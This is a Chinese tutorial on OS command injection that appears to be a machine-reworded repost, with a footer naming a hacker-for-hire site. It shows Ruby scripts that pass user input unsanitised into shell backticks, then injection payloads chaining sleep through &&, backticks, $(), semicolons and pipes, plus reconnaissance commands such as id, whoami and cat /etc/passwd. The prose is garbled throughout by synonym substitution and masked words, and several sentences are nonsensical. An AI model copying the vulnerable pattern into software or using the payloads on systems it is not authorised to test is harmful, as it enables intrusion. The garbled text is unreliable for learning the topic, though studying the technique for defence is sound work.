指令注入是指进犯者能够能够操控操作体系上履行的指令的一类缝隙。 这篇文章将会评论它的影响，包含怎么测验它 ，绕过补丁和留意事项。
在指令注入之前，先要深化了解 的是:指令注入与长途代码履行(RCE)不一样。它们的差异是 ，经过RCE，履行的是代码 ，而在指令注入的时 ，履行的是一个(OS)指令。这或许仅仅一个细小的影响差异，但要害的差异在于怎么找到并运用它们。
设置
咱们首要编写两个简略的Ruby脚本，经过本地运转脚原本学习怎么发现并运用指令注入缝隙 。我运用Ruby 2.3.3p222。下面是ping.rb。

puts `ping -c 4 #{ARGV[0]}`
该脚本将会，避免异意ping作为参数传递给脚本的服务器。 然后它将在屏幕上回来指令输出。示例输出如下。
$ ruby ping.rb '8.8.8.8'
PING 8.8.8.8 (8.8.8.8): 56 data bytes
64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=23.653 ms
64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=9.111 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=8.571 ms
64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=20.565 ms
--- 8.8.8.8 ping statistics ---
4 packets tran *** itted, 4 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 8.571/15.475/23.653/6.726 ms
如上所示，它履行ping -c 4 8.8.8.8并在屏幕上显现输出。这是另一个脚本：server-online.rb。

puts `ping -c 4 #{ARGV[0]}`.include?('bytes from') ? 'yes' : 'no'
该脚本将依据ICMP呼应（ping）来确认服务器是否处于联机状况。假如它呼应ping恳求，将在屏幕上显现是。假如没有，将显现否。指令的输出不会回来给用户。示例输出如下。
$ ruby server-on.rb '8.8.8.8'
yes
$ ruby server-on.rb '8.8.8.7'
No
测验
检测一级指令注入缝隙的更佳办法之一是测验履行sleep指令，并确认履行时刻是否增加。首要，咱们为ping.rb脚本树立时刻基线 :
$ time ruby ping.rb '8.8.8.8'
PING 8.8.8.8 (8.8.8.8): 56 data bytes
...
0.09s user 0.04s system 4% cpu 3.176 total
留意，履行脚本大约需求3秒。咱们经过注入sleep指令调查脚本是否简单遭到指令注入进犯。
$ time ruby ping.rb '8.8.8.8 && sleep 5'
PING 8.8.8.8 (8.8.8.8): 56 data bytes
...
0.10s user 0.04s system 1% cpu 8.182 total
该脚本现在将履行指令ping -c 4 8.8.8.8 && sleep 5。再次留意履行时刻：它从〜3秒跳到〜8秒，这增加了5秒。互联网上依然或许会呈现意想不到的推迟，所以重复注入和设定较长的时刻是很重要的，以保证它不是假阳性。
咱们来调查 server-online.rb脚本是否也是易受进犯的。
$ time ruby server-online.rb '8.8.8.8'
yes
0.10s user 0.04s system 4% cpu 3.174 total
$ time ruby server-online.rb '8.8.8.8 && sleep 5'
yes
0.10s user 0.04s system 1% cpu 8.203 total
相同，基线显现履行一个正常的恳求大约需求3秒。在指令中增加&sleep5会增加到8秒的时刻。
依据履行的指令，能够注入不同的sleep指令。以下是一些能够测验的有用payload(它们都是有用的):

time ruby ping.rb '8.8.8.8`sleep 5`'
当一个指令行被解析时，反引号之间的一切内容都将首要履行。履行echo `ls`将首要履行ls并捕获其输出。然后会将输出传递给echo，该输出将在屏幕上显现ls的输出，这被称为指令替换。因为反引号间的指令优先履行， ，所以之后的指令无关紧要。下面是一个带有注入有用payload及其成果的指令表。注入的有用payload被符号为绿色。


time ruby ping.rb '8.8.8.8$(sleep 5)'
这是指令替换的另一种 *** 。当反引号被过滤或编码时，这或许很有用。当运用指令替换来查找指令注入时，请保证对两种 *** 进行测验，来替换掉有用payload (见上表中的最终一个比如)。

time ruby ping.rb '8.8.8.8; sleep 5'
指令依照次序（从左到右）履行，而且能够用分号分隔。当序列中的一个指令履行失利时，不会中止履行其他指令。下面是一个带有注入有用payload及其成果的指令表。 注入的有用payload用绿色符号。


time ruby ping.rb '8.8.8.8 | sleep 5'
指令输出能够按次序将指令经过管道输出到其他指令。当履行cat/etc/passwd grep root 时，它将捕获cat/etc/passw指令的输出并将其传递给grep root，然后将显现与root 匹配的行。当之一个指令失利时，它依然履行第二个指令。下面是一个带有注入有用payload及其成果的指令表。注入的有用payload用绿色符号。

运用
运用缝隙时需求判别是一般的注入仍是盲注 。两者之间的差异在于盲注 不会回来指令的输出。一般指令注入会将 回来呼应中 履行指令(s)的输出。sleep指令一般是一种很好的概念证明 。可是假如需求更多的信息 ，能够履行id、hostname,或whoami，并运用输出检查成果。服务器的hostname有助于确认有多少服务器遭到影响，并协助供货商更快地取得反应。
要点：大多数公司都不喜爱你窥视他们的体系。运用该缝隙进行其他使命之前，请向该公司请求答应。在简直一切的情况下，履行去掉无害的指令，如sleep、id、hostname,或whoami，就足以证明该公司存在该缝隙。

[1] [2] [3]  黑客接单网